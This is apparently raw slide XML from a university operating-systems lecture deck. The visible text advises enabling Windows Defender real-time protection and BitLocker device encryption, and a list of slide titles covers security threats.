              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="837113"/>
            <a:ext cx="7591200" cy="1790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You'll find it under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Settings &gt; Update &amp; Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>, and then click on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Windows Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>. It's a must that real-time protection should be turned on to allow Windows to constantly monitor for anything suspicious and step in should a detection occur.</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if you have a third-party antivirus application installed, Windows Defender will be turned off so as to avoid conflicts.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="234" name="Google Shape;234;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2367038" y="2684663"/>
            <a:ext cx="4409921" cy="22108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sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8726588" y="4749850"/>
            <a:ext cx="4173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198754"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2745525" y="651650"/>
            <a:ext cx="3414600" cy="10512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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1764000" y="200975"/>
            <a:ext cx="5424300" cy="1502100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FEFEF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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="200975"/>
            <a:ext cx="5502600" cy="55110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accent1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Roboto Slab"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="198754"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Setting up device encryption</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="752063"/>
            <a:ext cx="7591200" cy="17907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To enable device encryption, go to Start, search 'encryption' and select Change device encryption settings. </a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100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After that, select Manage BitLocker and turn it on, then follow the subsequent instructions. With your data encrypted, if hackers do manage to somehow access it, the information won't be of any use to them.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="244" name="Google Shape;244;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4910675" y="2428550"/>
            <a:ext cx="3655200" cy="2206574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600850" y="2542775"/>
            <a:ext cx="4093200" cy="1416000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-330200" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Merriweather"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>The only downside is that performance may take a bit of a hit on older machines, but if you need peace of mind regarding your precious data, it's worth it.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>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3638</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>427</Paragraphs>
  <Slides>56</Slides>
  <Notes>56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Merriweather</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Roboto Slab</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Cordelia template</vt:lpstr>
      <vt:lpstr>Operating Systems Lecture : 14</vt:lpstr>
      <vt:lpstr>Identify and use system utilities/tools and evaluate the results</vt:lpstr>
      <vt:lpstr>Avoiding inconvenient software update reboots</vt:lpstr>
      <vt:lpstr>Set auto login to avoid typing in passwords endlessly</vt:lpstr>
      <vt:lpstr>Moving apps to a different drive in Windows 10</vt:lpstr>
      <vt:lpstr>Backing up a Windows 10 PC</vt:lpstr>
      <vt:lpstr>Protecting your PC with Windows Firewall</vt:lpstr>
      <vt:lpstr>Benefiting from Windows Defender</vt:lpstr>
      <vt:lpstr>Setting up device encryption</vt:lpstr>
      <vt:lpstr>Revert to previous versions of files</vt:lpstr>
      <vt:lpstr>Disk Cleanup in Windows 10</vt:lpstr>
      <vt:lpstr>Disk Defragmenter in Windows 10</vt:lpstr>
      <vt:lpstr>System Configuration in Windows 10</vt:lpstr>
      <vt:lpstr>Windows Memory Diagnostic</vt:lpstr>
      <vt:lpstr>Program Threats, Security Violation Method Security Attacks, Security Measure Level</vt:lpstr>
      <vt:lpstr>The Security Problem</vt:lpstr>
      <vt:lpstr>Security Violation Categories</vt:lpstr>
      <vt:lpstr>Security Violation Methods</vt:lpstr>
      <vt:lpstr>Security Violation Methods</vt:lpstr>
      <vt:lpstr>Security Measure Levels</vt:lpstr>
      <vt:lpstr>Security Measure Levels</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats</vt:lpstr>
      <vt:lpstr>Program Threats </vt:lpstr>
      <vt:lpstr>Four-layered Model of Security</vt:lpstr>
      <vt:lpstr>Program Threats </vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>Great Programming Required?</vt:lpstr>
      <vt:lpstr>Program Threats </vt:lpstr>
      <vt:lpstr>Program Threats </vt:lpstr>
      <vt:lpstr>A Boot-sector Computer Virus</vt:lpstr>
      <vt:lpstr>The Threat Continues</vt:lpstr>
      <vt:lpstr>System and Network Threats</vt:lpstr>
      <vt:lpstr>System and Network Threats </vt:lpstr>
      <vt:lpstr>System and Network Threats </vt:lpstr>
      <vt:lpstr>System and Network Threats </vt:lpstr>
      <vt:lpstr>Standard Security Attacks</vt:lpstr>
      <vt:lpstr>Let’s do some exercises!</vt:lpstr>
      <vt:lpstr>Exercises</vt:lpstr>
      <vt:lpstr>Exercises (cont.)</vt:lpstr>
      <vt:lpstr>Exercises (cont.)</vt:lpstr>
      <vt:lpstr>Exercises (cont.)</vt:lpstr>
      <vt:lpstr>Exercises (cont.)</vt:lpstr>
      <vt:lpstr>Exercises (cont.)</vt:lpstr>
      <vt:lpstr>Exercises (cont.)</vt:lpstr>
      <vt:lpstr>Exercises (cont.)</vt:lpstr>
      <vt:lpstr>Exercises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Shams, Fahim</dc:creator>
  <cp:lastModifiedBy>Shams, Fahim</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-07T01:25:51Z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65e3ec-2057-4a1c-aac9-900f17f24dd1_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_ba65e3ec-2057-4a1c-aac9-900f17f24dd1_SetDate">
    <vt:lpwstr>2024-11-07T01:22:38Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_ba65e3ec-2057-4a1c-aac9-900f17f24dd1_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_ba65e3ec-2057-4a1c-aac9-900f17f24dd1_Name">
    <vt:lpwstr>defa4170-0d19-0005-0004-bc88714345d2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_ba65e3ec-2057-4a1c-aac9-900f17f24dd1_SiteId">
    <vt:lpwstr>61f86c18-3283-4e11-ac6e-accd12e10ed4</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_ba65e3ec-2057-4a1c-aac9-900f17f24dd1_ActionId">
    <vt:lpwstr>733c9ca9-62f2-4e2d-8665-804046ea5aba</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_ba65e3ec-2057-4a1c-aac9-900f17f24dd1_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>